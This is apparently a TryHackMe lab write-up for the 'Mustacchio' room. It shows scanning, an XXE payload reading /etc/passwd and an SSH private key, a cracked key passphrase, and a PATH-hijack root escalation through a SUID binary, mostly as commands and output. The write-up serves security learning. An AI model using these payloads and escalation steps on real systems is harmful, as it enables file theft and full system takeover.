👺Mustacchio

License

The following post by anthonyjsaab is licensed under CC BY 4.0

0 - Introduction

Link to room: https://tryhackme.com/r/room/mustacchio

Machine version: Mustacchio V2

This writeup walks you through a room on TryHackMe created by zyeinn

1 - Port Scans

1a - Discovery

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -T4 -p- -Pn mustacchio.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-21 18:56 EEST
Nmap scan report for mustacchio.thm (10.10.75.137)
Host is up (0.100s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8765/tcp open  ultraseek-http

Nmap done: 1 IP address (1 host up) scanned in 111.50 seconds

1b - Versioning and OS fingerprinting

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -O -T4 -p22,80,8765 -Pn mustacchio.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-21 18:58 EEST
Nmap scan report for mustacchio.thm (10.10.75.137)
Host is up (0.096s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 58:1b:0c:0f:fa:cf:05:be:4c:c0:7a:f1:f1:88:61:1c (RSA)
|   256 3c:fc:e8:a3:7e:03:9a:30:2c:77:e0:0a:1c:e4:52:e6 (ECDSA)
|_  256 9d:59:c6:c7:79:c5:54:c4:1d:aa:e4:d1:84:71:01:92 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Mustacchio | Home
| http-robots.txt: 1 disallowed entry 
|_/
8765/tcp open  http    nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Mustacchio | Login
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|specialized|storage-misc
Running (JUST GUESSING): Linux 5.X|3.X (89%), Crestron 2-Series (86%), HP embedded (85%)
OS CPE: cpe:/o:linux:linux_kernel:5.4 cpe:/o:linux:linux_kernel:3 cpe:/o:crestron:2_series cpe:/h:hp:p2000_g3
Aggressive OS guesses: Linux 5.4 (89%), Linux 3.10 - 3.13 (88%), Crestron XPanel control system (86%), HP P2000 G3 NAS device (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.53 seconds

1c - Vulners

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV --script vulners --script-args mincvss=7.5 -p22,80,8765 -Pn mustacchio.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-21 19:00 EEST
Nmap scan report for mustacchio.thm (10.10.75.137)
Host is up (0.094s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| vulners: 
|   cpe:/a:openbsd:openssh:7.2p2: 
|     	PRION:CVE-2016-8858	7.8	https://vulners.com/prion/PRION:CVE-2016-8858
|     	PRION:CVE-2016-6515	7.8	https://vulners.com/prion/PRION:CVE-2016-6515
|     	PACKETSTORM:140070	7.8	https://vulners.com/packetstorm/PACKETSTORM:140070	*EXPLOIT*
|     	EXPLOITPACK:5BCA798C6BA71FAE29334297EC0B6A09	7.8	https://vulners.com/exploitpack/EXPLOITPACK:5BCA798C6BA71FAE29334297EC0B6A09	*EXPLOIT*
|     	EDB-ID:40888	7.8	https://vulners.com/exploitdb/EDB-ID:40888	*EXPLOIT*
|     	CVE-2016-8858	7.8	https://vulners.com/cve/CVE-2016-8858
|     	CVE-2016-6515	7.8	https://vulners.com/cve/CVE-2016-6515
|     	1337DAY-ID-26494	7.8	https://vulners.com/zdt/1337DAY-ID-26494	*EXPLOIT*
|     	SSV:92579	7.5	https://vulners.com/seebug/SSV:92579	*EXPLOIT*
|     	PRION:CVE-2023-35784	7.5	https://vulners.com/prion/PRION:CVE-2023-35784
|     	PRION:CVE-2016-10009	7.5	https://vulners.com/prion/PRION:CVE-2016-10009
|     	PACKETSTORM:173661	7.5	https://vulners.com/packetstorm/PACKETSTORM:173661	*EXPLOIT*
|     	CVE-2023-35784	7.5	https://vulners.com/cve/CVE-2023-35784
|     	CVE-2016-10009	7.5	https://vulners.com/cve/CVE-2016-10009
|     	1337DAY-ID-26576	7.5	https://vulners.com/zdt/1337DAY-ID-26576	*EXPLOIT*
|     	PACKETSTORM:151227	0.0	https://vulners.com/packetstorm/PACKETSTORM:151227	*EXPLOIT*
|     	PACKETSTORM:140261	0.0	https://vulners.com/packetstorm/PACKETSTORM:140261	*EXPLOIT*
|     	PACKETSTORM:138006	0.0	https://vulners.com/packetstorm/PACKETSTORM:138006	*EXPLOIT*
|     	PACKETSTORM:137942	0.0	https://vulners.com/packetstorm/PACKETSTORM:137942	*EXPLOIT*
|_    	1337DAY-ID-30937	0.0	https://vulners.com/zdt/1337DAY-ID-30937	*EXPLOIT*
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| vulners: 
|   cpe:/a:apache:http_server:2.4.18: 
|     	PACKETSTORM:176334	7.5	https://vulners.com/packetstorm/PACKETSTORM:176334	*EXPLOIT*
|     	PACKETSTORM:171631	7.5	https://vulners.com/packetstorm/PACKETSTORM:171631	*EXPLOIT*
|     	OSV:BIT-APACHE-2023-25690	7.5	https://vulners.com/osv/OSV:BIT-APACHE-2023-25690
|     	OSV:BIT-APACHE-2022-31813	7.5	https://vulners.com/osv/OSV:BIT-APACHE-2022-31813
|     	OSV:BIT-APACHE-2022-23943	7.5	https://vulners.com/osv/OSV:BIT-APACHE-2022-23943
|     	OSV:BIT-APACHE-2022-22720	7.5	https://vulners.com/osv/OSV:BIT-APACHE-2022-22720
|     	OSV:BIT-APACHE-2021-44790	7.5	https://vulners.com/osv/OSV:BIT-APACHE-2021-44790
|     	OSV:BIT-APACHE-2021-42013	7.5	https://vulners.com/osv/OSV:BIT-APACHE-2021-42013
|     	OSV:BIT-APACHE-2021-41773	7.5	https://vulners.com/osv/OSV:BIT-APACHE-2021-41773
|     	OSV:BIT-APACHE-2021-39275	7.5	https://vulners.com/osv/OSV:BIT-APACHE-2021-39275
|     	OSV:BIT-APACHE-2021-26691	7.5	https://vulners.com/osv/OSV:BIT-APACHE-2021-26691
|     	OSV:BIT-APACHE-2020-11984	7.5	https://vulners.com/osv/OSV:BIT-APACHE-2020-11984
|     	MSF:EXPLOIT-MULTI-HTTP-APACHE_NORMALIZE_PATH_RCE-	7.5	https://vulners.com/metasploit/MSF:EXPLOIT-MULTI-HTTP-APACHE_NORMALIZE_PATH_RCE-	*EXPLOIT*
|     	MSF:AUXILIARY-SCANNER-HTTP-APACHE_NORMALIZE_PATH-	7.5	https://vulners.com/metasploit/MSF:AUXILIARY-SCANNER-HTTP-APACHE_NORMALIZE_PATH-	*EXPLOIT*
|     	F9C0CD4B-3B60-5720-AE7A-7CC31DB839C5	7.5	https://vulners.com/githubexploit/F9C0CD4B-3B60-5720-AE7A-7CC31DB839C5	*EXPLOIT*
|     	F41EE867-4E63-5259-9DF0-745881884D04	7.5	https://vulners.com/githubexploit/F41EE867-4E63-5259-9DF0-745881884D04	*EXPLOIT*
|     	EDB-ID:51193	7.5	https://vulners.com/exploitdb/EDB-ID:51193	*EXPLOIT*
|     	EDB-ID:50512	7.5	https://vulners.com/exploitdb/EDB-ID:50512	*EXPLOIT*
|     	EDB-ID:50446	7.5	https://vulners.com/exploitdb/EDB-ID:50446	*EXPLOIT*
|     	EDB-ID:50406	7.5	https://vulners.com/exploitdb/EDB-ID:50406	*EXPLOIT*
|     	E796A40A-8A8E-59D1-93FB-78EF4D8B7FA6	7.5	https://vulners.com/githubexploit/E796A40A-8A8E-59D1-93FB-78EF4D8B7FA6	*EXPLOIT*
|     	CVE-2023-25690	7.5	https://vulners.com/cve/CVE-2023-25690
|     	CVE-2022-31813	7.5	https://vulners.com/cve/CVE-2022-31813
|     	CVE-2022-23943	7.5	https://vulners.com/cve/CVE-2022-23943
|     	CVE-2022-22720	7.5	https://vulners.com/cve/CVE-2022-22720
|     	CVE-2021-44790	7.5	https://vulners.com/cve/CVE-2021-44790
|     	CVE-2021-39275	7.5	https://vulners.com/cve/CVE-2021-39275
|     	CVE-2021-26691	7.5	https://vulners.com/cve/CVE-2021-26691
|     	CVE-2017-7679	7.5	https://vulners.com/cve/CVE-2017-7679
|     	CVE-2017-3169	7.5	https://vulners.com/cve/CVE-2017-3169
|     	CVE-2017-3167	7.5	https://vulners.com/cve/CVE-2017-3167
|     	CNVD-2022-73123	7.5	https://vulners.com/cnvd/CNVD-2022-73123
|     	CNVD-2022-03225	7.5	https://vulners.com/cnvd/CNVD-2022-03225
|     	CNVD-2021-102386	7.5	https://vulners.com/cnvd/CNVD-2021-102386
|     	CC15AE65-B697-525A-AF4B-38B1501CAB49	7.5	https://vulners.com/githubexploit/CC15AE65-B697-525A-AF4B-38B1501CAB49	*EXPLOIT*
|     	C879EE66-6B75-5EC8-AA68-08693C6CCAD1	7.5	https://vulners.com/githubexploit/C879EE66-6B75-5EC8-AA68-08693C6CCAD1	*EXPLOIT*
|     	B02819DB-1481-56C4-BD09-6B4574297109	7.5	https://vulners.com/githubexploit/B02819DB-1481-56C4-BD09-6B4574297109	*EXPLOIT*
|     	9B4F4E4A-CFDF-5847-805F-C0BAE809DBD5	7.5	https://vulners.com/githubexploit/9B4F4E4A-CFDF-5847-805F-C0BAE809DBD5	*EXPLOIT*
|     	8713FD59-264B-5FD7-8429-3251AB5AB3B8	7.5	https://vulners.com/githubexploit/8713FD59-264B-5FD7-8429-3251AB5AB3B8	*EXPLOIT*
|     	831E1114-13D1-54EF-BDE4-F655114CDC29	7.5	https://vulners.com/githubexploit/831E1114-13D1-54EF-BDE4-F655114CDC29	*EXPLOIT*
|     	78787F63-0356-51EC-B32A-B9BD114431C3	7.5	https://vulners.com/githubexploit/78787F63-0356-51EC-B32A-B9BD114431C3	*EXPLOIT*
|     	6A0A657E-8300-5312-99CE-E11F460B1DBF	7.5	https://vulners.com/githubexploit/6A0A657E-8300-5312-99CE-E11F460B1DBF	*EXPLOIT*
|     	64D31BF1-F977-51EC-AB1C-6693CA6B58F3	7.5	https://vulners.com/githubexploit/64D31BF1-F977-51EC-AB1C-6693CA6B58F3	*EXPLOIT*
|     	61075B23-F713-537A-9B84-7EB9B96CF228	7.5	https://vulners.com/githubexploit/61075B23-F713-537A-9B84-7EB9B96CF228	*EXPLOIT*
|     	5C1BB960-90C1-5EBF-9BEF-F58BFFDFEED9	7.5	https://vulners.com/githubexploit/5C1BB960-90C1-5EBF-9BEF-F58BFFDFEED9	*EXPLOIT*
|     	5312D04F-9490-5472-84FA-86B3BBDC8928	7.5	https://vulners.com/githubexploit/5312D04F-9490-5472-84FA-86B3BBDC8928	*EXPLOIT*
|     	52E13088-9643-5E81-B0A0-B7478BCF1F2C	7.5	https://vulners.com/githubexploit/52E13088-9643-5E81-B0A0-B7478BCF1F2C	*EXPLOIT*
|     	495E99E5-C1B0-52C1-9218-384D04161BE4	7.5	https://vulners.com/githubexploit/495E99E5-C1B0-52C1-9218-384D04161BE4	*EXPLOIT*
|     	3F17CA20-788F-5C45-88B3-E12DB2979B7B	7.5	https://vulners.com/githubexploit/3F17CA20-788F-5C45-88B3-E12DB2979B7B	*EXPLOIT*
|     	22DCCD26-B68C-5905-BAC2-71D10DE3F123	7.5	https://vulners.com/githubexploit/22DCCD26-B68C-5905-BAC2-71D10DE3F123	*EXPLOIT*
|     	2108729F-1E99-54EF-9A4B-47299FD89FF2	7.5	https://vulners.com/githubexploit/2108729F-1E99-54EF-9A4B-47299FD89FF2	*EXPLOIT*
|     	1337DAY-ID-39214	7.5	https://vulners.com/zdt/1337DAY-ID-39214	*EXPLOIT*
|     	1337DAY-ID-38427	7.5	https://vulners.com/zdt/1337DAY-ID-38427	*EXPLOIT*
|     	1337DAY-ID-37777	7.5	https://vulners.com/zdt/1337DAY-ID-37777	*EXPLOIT*
|     	1337DAY-ID-36952	7.5	https://vulners.com/zdt/1337DAY-ID-36952	*EXPLOIT*
|     	1337DAY-ID-34882	7.5	https://vulners.com/zdt/1337DAY-ID-34882	*EXPLOIT*
|     	PACKETSTORM:152441	0.0	https://vulners.com/packetstorm/PACKETSTORM:152441	*EXPLOIT*
|     	B0A9E5E8-7CCC-5984-9922-A89F11D6BF38	0.0	https://vulners.com/githubexploit/B0A9E5E8-7CCC-5984-9922-A89F11D6BF38	*EXPLOIT*
|_    	45D138AD-BEC6-552A-91EA-8816914CA7F4	0.0	https://vulners.com/githubexploit/45D138AD-BEC6-552A-91EA-8816914CA7F4	*EXPLOIT*
8765/tcp open  http    nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.64 seconds

2 - Port 80

2a - Dirbusting

┌──(kali㉿kali)-[~]
└─$ gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://mustacchio.thm 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://mustacchio.thm
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 279]
/.htaccess            (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/custom               (Status: 301) [Size: 317] [--> http://mustacchio.thm/custom/]
/fonts                (Status: 301) [Size: 316] [--> http://mustacchio.thm/fonts/]
/images               (Status: 301) [Size: 317] [--> http://mustacchio.thm/images/]
/index.html           (Status: 200) [Size: 1752]
/robots.txt           (Status: 200) [Size: 28]
/server-status        (Status: 403) [Size: 279]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

After going though the files and folders shown above, we can find a file named users.bak here:

2b - Opening users.bak

The file extension .bak is a generic suffix used to designated a backup file. Thus, it does not tell us what kind of file we have and how to open it. The first tool to use is exiftool:

┌──(kali㉿kali)-[~]
└─$ exiftool Downloads/users.bak
ExifTool Version Number         : 12.76
File Name                       : users.bak
Directory                       : Downloads
File Size                       : 8.2 kB
File Modification Date/Time     : 2024:05:21 19:06:57+03:00
File Access Date/Time           : 2024:05:21 19:07:49+03:00
File Inode Change Date/Time     : 2024:05:21 19:06:57+03:00
File Permissions                : -rw-r--r--
Error                           : Unknown file type

It did not help us. Next, we try to opening it using Mousepad:

┌──(kali㉿kali)-[~]
└─$ sqlite3 Downloads/users.bak
SQLite version 3.45.1 2024-01-30 16:01:20
Enter ".help" for usage hints.
sqlite> .tables
users
sqlite> SELECT * FROM users;
admin|1868e36a6d2b17d4c2745f1659433a54d4bc5f4b

After some searching for a login portal, we find that the port 8765 has one.

3 - Port 8765

3a - Logging in

Trying to login using the recovered credentials does not work. I suspect that the password was not stored in plaintext but as a hash. Thus, we need to crack it and try again:

3b - Comment input

3bi - Probing

Now this is clear. The input text field requires those 3 child elements: name, author and comment. Let us try:

I couldn't figure out the correct tag for the comment section, but I guess we won't really need it since two others are working.

Now, I wasn't sure what I could do with this field. I googled XML attacks, and found this interesting webpage: https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing

3c - XXE powered exfiltration

I crafted this payload:

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE name [
  <!ELEMENT name ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<name>&xxe;</name>
<author>insecureman1337</author>
</root>

and got this:

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false lxd:x:106:65534::/var/lib/lxd/:/bin/false messagebus:x:107:111::/var/run/dbus:/bin/false uuidd:x:108:112::/run/uuidd:/bin/false dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin pollinate:x:111:1::/var/cache/pollinate:/bin/false joe:x:1002:1002::/home/joe:/bin/bash barry:x:1003:1003::/home/barry:/bin/bash

We now know the target machine has two human user accounts: joe and barry

Let us try to retrieve their respective SSH private keys.

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE name [
  <!ELEMENT name ANY >
  <!ENTITY xxe SYSTEM "file:///home/barry/.ssh/id_rsa" >]>
<root>
<name>&xxe;</name>
<author>insecureman1337</author>
</root>

It worked for barry only and not joe.

4 - SSH

4a - SSH key cracking

The above key is encrypted. We need to crack it.

┌──(kali㉿kali)-[~]
└─$ john --wordlist=~/Documents/rockyou.txt barry.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
No password hashes left to crack (see FAQ)
                                        
┌──(kali㉿kali)-[~]
└─$ john --wordlist=~/Documents/rockyou.txt barry.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
No password hashes left to crack (see FAQ)
                                             
┌──(kali㉿kali)-[~]
└─$ john --show barry.hash 
barry_id_rsa:urieljames

1 password hash cracked, 0 left

4b - Foothold!

┌──(kali㉿kali)-[~]
└─$ ssh [email protected] -i barry_id_rsa
Enter passphrase for key 'barry_id_rsa': 
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-210-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

34 packages can be updated.
16 of these updates are security updates.
To see these additional updates run: apt list --upgradable



The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

barry@mustacchio:~$ ls -la
total 20
drwxr-xr-x 4 barry barry 4096 May 22 06:45 .
drwxr-xr-x 4 root  root  4096 Jun 12  2021 ..
drwx------ 2 barry barry 4096 May 22 06:45 .cache
drwxr-xr-x 2 barry barry 4096 Jun 12  2021 .ssh
-rw-r--r-- 1 barry barry   33 Jun 12  2021 user.txt

5 - PrivEsc

5a - Looking around

The first move I always do when establishing foothold is go to the home directories of other users. Looking into joe's home dir:

barry@mustacchio:~$ cd /home/joe
barry@mustacchio:/home/joe$ ls -la
total 28
drwxr-xr-x 2 joe  joe   4096 Jun 12  2021 .
drwxr-xr-x 4 root root  4096 Jun 12  2021 ..
-rwsr-xr-x 1 root root 16832 Jun 12  2021 live_log
barry@mustacchio:/home/joe$ file live_log
live_log: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=6c03a68094c63347aeb02281a45518964ad12abe, for GNU/Linux 3.2.0, not stripped

This is important, we have a root-owned executable with the SUID bit set! Let us look into this.

5b - Weaponizing and Escalation

We exfiltrate the ELF executable to our Kali machine for further analysis:

┌──(kali㉿kali)-[~]
└─$ scp -i barry_id_rsa [email protected]:/home/joe/live_log .
live_log                                        100%   16KB  40.4KB/s   00:00    
                                                                                  
┌──(kali㉿kali)-[~]
└─$ strings live_log 
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
printf
system
__cxa_finalize
setgid
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u+UH
[]A\A]A^A_
Live Nginx Log Reader
tail -f /var/log/nginx/access.log
:*3$"
GCC: (Ubuntu 9.3.0-17ubuntu1~20.04) 9.3.0
--snip--

Nice! It seems the executable is executing tail. Let us check if this is right:

barry@mustacchio:/home/joe$ ./live_log 
10.11.85.12 - - [22/May/2024:09:56:56 +0000] "GET / HTTP/1.1" 200 728 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
10.11.85.12 - - [22/May/2024:09:56:57 +0000] "GET / HTTP/1.1" 200 728 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
10.11.85.12 - - [22/May/2024:09:57:00 +0000] "POST /home.php HTTP/1.1" 302 3860 "http://mustacchio.thm:8765/home.php" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
10.11.85.12 - - [22/May/2024:09:57:00 +0000] "GET /index.php HTTP/1.1" 200 728 "http://mustacchio.thm:8765/home.php" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"

It does seem to execute tail on a log file. Since a relative path was used to reference tail, we can change PATH and make live_log launch a program of our choice with root privileges.

barry@mustacchio:~$ nano shell.py
barry@mustacchio:~$ cat shell.py 
#!/usr/bin/python3
import pty
pty.spawn("/bin/bash")

barry@mustacchio:~$ printenv | grep PATH
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
barry@mustacchio:~$ export PATH=/home/barry:$PATH
barry@mustacchio:~$ printenv | grep PATH
PATH=/home/barry:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
barry@mustacchio:~$ mv shell.py tail
barry@mustacchio:~$ chmod +x tail
barry@mustacchio:~$ /home/joe/live_log 
root@mustacchio:~# id
uid=0(root) gid=0(root) groups=0(root),1003(barry)
root@mustacchio:~#

PreviousmKingdom NextOpacity

Last updated 1 year ago

hashtagLicense

hashtag0 - Introduction

hashtag1 - Port Scans

hashtag1a - Discovery

hashtag1b - Versioning and OS fingerprinting

hashtag1c - Vulners

hashtag2 - Port 80

hashtag2a - Dirbusting

hashtag2b - Opening users.bak

hashtag3 - Port 8765

hashtag3a - Logging in

hashtag3b - Comment input

hashtag3bi - Probing

hashtag3c - XXE powered exfiltration

hashtag4 - SSH

hashtag4a - SSH key cracking

hashtag4b - Foothold!

hashtag5 - PrivEsc

hashtag5a - Looking around

hashtag5b - Weaponizing and Escalation